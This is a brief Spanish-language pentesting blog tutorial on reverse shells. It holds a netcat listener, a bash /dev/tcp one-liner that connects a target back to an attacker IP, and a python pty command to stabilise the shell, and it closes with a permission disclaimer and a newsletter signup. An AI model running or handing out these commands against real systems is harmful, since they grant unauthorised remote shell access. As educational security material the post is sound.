~ / blog / pentesting
KALI

Reverse shell

Una reverse shell hace que la víctima se conecte de vuelta a ti, saltándose el firewall de entrada.

Primero, en tu máquina, pones netcat a escuchar en un puerto. Cuando ejecutas el payload de bash en el objetivo, este se conecta a ti y te entrega una shell.

El truco pro: estabilízala con python y pty, así tienes autocompletado y no se muere a la primera. Entender esto es clave para atacar, y también para defender.

# los comandos

kali@kali:~$ nc -lvnp 4444copiar
listening on [any] 4444 ...
victim$ bash -i >& /dev/tcp/10.0.0.50/4444 0>&1copiar
$ python3 -c 'import pty;pty.spawn("/bin/bash")'copiar
www-data@web:$ idcopiar
uid=33(www-data) gid=33(www-data)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.